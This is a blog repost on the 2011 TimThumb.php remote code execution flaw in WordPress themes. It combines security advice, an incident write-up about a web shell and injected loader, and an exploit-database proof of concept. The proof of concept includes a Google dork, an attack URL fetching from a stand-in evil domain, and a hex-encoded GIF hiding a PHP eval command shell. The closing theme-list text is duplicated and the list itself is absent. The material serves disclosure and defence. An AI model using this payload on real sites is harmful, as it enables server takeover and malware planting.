Timthumb.php Security Vulnerability [Wordpress Theme]
This news is very famous in this week and I got some page to this post for my read. If you want to see full article or detail of the news, please go to the source.
The News
There has been some buzz about a zero day vulnerability found in Timthumb.php that can allow for arbitrary file uploads. Although this is a platform independent issue, it is specially an issue on WordPress where a lot of theme authors choose to include scripts in themes without any extra security measures.
You can read more details about the TimThumb issue here: markmaunder.com
This is definitely an issue, but it’s just the tip of the iceberg. TimThumb is just one of various scripts that are being added to themes/plugins without further vetting, or even incorrectly. Take Uploadify for example, which we’ve recently seen being exploited in very old versions of a popular WordPress theme.
Another issue is inexperience, well, along with laziness in some cases. WordPress has built in a lot of great capabilities that aren’t being properly leveraged. For example, if theme/plugin authors were properly leveraging add_image_size vs. adding TimThumb they would be in a safer position today.
Unfortunately this is not an easy problem to tackle. WordPress core has a great review and vetting process, it is very controlled for good reason. The problem here is really around plugins and themes, it’s not as simple as you may think to check every release being there are thousands of free and premium options on the market today.
Minimize Your Risk
Here are a few things that if put into practice, will help you minimize the risk of getting exploited:- Keep your themes and plugins updated – #1 cause of malware infections and hacks independent of any platform!
- Only download from reputable sources (WordPress.org).
- Only use plugins and themes that are being actively developed and have good, trusted reviews. Do your homework
- Keep an eye on WordPress security news to see if there are any issues with the plugins or themes you are using.
- Don’t just disable, remove any software that you’re not actively using. Just because it’s not active doesn’t mean it’s not vulnerable
Sucuri WordPress Check
Here is a script we created to enable you to check for some of the issues we’ve outlined above – Sucuri WP CheckHow to Use
- Save script to your local machine by right clicking the link above and save link as
- Login to your site via sFTP or FTP (We recommend sFTP/SSH)
- Upload the script to your root WordPress directory
- Rename sucuri_wp_check.txt to sucuri_wp_check.php
- Run the script via browser of choice – yourdomain.com/sucuri_wp_check.php – Make sure you change the URL path to your domain and wherever you uploaded the file
- Check the results
details and scripts of the WordPress Timthumb.php hack
I also run the latest version of WordPress.org.My WordPress root directory was writable, but making it read only would not have prevented the hack.
Timthumb.php in it’s default configuration allows site visitors to load images from a predefined set of remote websites for resizing and serving. Timthumb offers a caching mechanism so that it doesn’t have to continually re-process images. The cache directory lives under the wordpress root and is accessible by visitors to the website.
The ability for a site visitor to load content from a remote website and to make the web server write that remote content to a web accessible directory is the cause of the vulnerability in timthumb.php.
To be clear, timthumb.php does not actually execute any remote malicious code that causes this vulnerability. This was a point of confusion among some commenters in my blog post yesterday. It simply gets a remote file and places it in a web accessible directory.
Timthumb only allows remote content from a small range of websites to be loaded remotely. In it’s default configuration these included Blogger, WordPress.com and other sites that are writeable by the general public.
Timthumb’s verification that remote content was only being loaded by these domains was also broken. You could for example load content from hackersiteblogspot.com or from blogspot.com.hackersite.com.
I’ve submitted a patch that fixes the pattern matching and removed all default public hosting sites from the allowed sites list. The developer has opted to keep a small list in which I’m not in favor of.
In my case the hacker uploaded a script to my cache directory which timthumb.php stores as “external_
The script uploaded was Alucar shell which is base64 encoded and decodes when it executes. That makes it a little harder to find it using grep or similar tool. You can see the encoded version of Alucar here and the decoded version of Alucar here (without the username and password preamble at the top).
Here’s a screenshot of the UI:
This script which gives a web based shell access was then used to inject base64 code to one of my core wordpress files wp-blog-header.php which lives in the wordpress root directory. The file with injected code looked like this.
The decoded version of this base64 code is this. The code executes whenever a blog page is visited. It fetches a file from a URL and writes it to /tmp. Then it executes the php code that is contained in this file. In my case it simply echo’d some javascript code that would show ads. Here is the code contained in the file in /tmp.
Again, this file is periodically updated with new PHP code, so the attacker could have his way with my server until I found out about it. The code could be altered to instead become a spam system and work it’s way through a long list of spam emails.
The way I tracked this to conclusion was:
- Heard audio on my blog telling me I’d won something.
- Checked Chrome network tools and saw ad content loading and I don’t serve ads.
- Grepped wordpress source and themes for hostname I saw in ad. Nothing.
- Dumped mysql databases on server (all of them) and grepped for hostname. Nothing.
- Confusion reigns.
- Started working my way through nginx (which is my front end proxy to apache) and apache access and error logs.
- Spotted lines in apache error log like this: “[Mon Aug 01 11:09:12 2011] [error] [client 127.0.0.1] PHP Warning: file_get_contents(http://blogger.com.zoha.vn/db/load.php): failed to open stream: HTTP request failed! in /usr/local/markmaunder/wp-content/themes/Memoir/timthumb.php on line 675″
- Checked timthumb’s cache directory and found Alucar.
- Realized base64 encoding is why I didn’t find anything with grep.
- Regrepped wordpress source and database and found injection in wp-blog-header.php
- Decoded base64 stuff and played with Alucar
- Found tmp file in /tmp
- Cleaned everything and fixed permissions. Ran chkrootkit and other utils on machine to see if anything else was compromised. Changed passwords, etc.
Proof-Of-Concept. [PoC]
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
WordPress TimThumb (Theme) Plugin - Remote Code Execution
Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, due to the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.
Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.
Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
(Transparent GIF +
-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.
NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011
List of Themes
The Timthumb 0-day security vulnerability is generating a lot of noise and for good reason. If you have a theme that includes TimThumb, your site can be easily hacked.
Because of this, we checked the WordPress Free Themes Directory and aggregated a list of themes that include TimThumb.
If you use any of the following themes please check to see if the script is present, and make sure it is updated:
Caution: This is not a full list of every theme in the directory that may include TimThumb, just a good start. Even if your theme is not found on this list it is a good idea to do a thorough review for the script, and not a bad thought to contact the theme author.
Note: We only listed the free themes found in the WordPress Free Themes Directory SVN, there are probably many more themes that include TimThumb in the premium theme market. Make sure to check with your vendor to ensure the vulnerability has been fixed if they include the script.
Edit: Thanks to @ottodestruct for clarifying that not all of these themes are approved and/or available to the public via the WordPress Free Themes Directory. Although they are currently found in the theme repository, they are not all publicly available for download.
Because of this, we checked the WordPress Free Themes Directory and aggregated a list of themes that include TimThumb.
If you use any of the following themes please check to see if the script is present, and make sure it is updated:
Caution: This is not a full list of every theme in the directory that may include TimThumb, just a good start. Even if your theme is not found on this list it is a good idea to do a thorough review for the script, and not a bad thought to contact the theme author.
Note: We only listed the free themes found in the WordPress Free Themes Directory SVN, there are probably many more themes that include TimThumb in the premium theme market. Make sure to check with your vendor to ensure the vulnerability has been fixed if they include the script.
Edit: Thanks to @ottodestruct for clarifying that not all of these themes are approved and/or available to the public via the WordPress Free Themes Directory. Although they are currently found in the theme repository, they are not all publicly available for download.
By Kaila Piyush HackingArticles4all.blogspot.com
No comments:
Post a Comment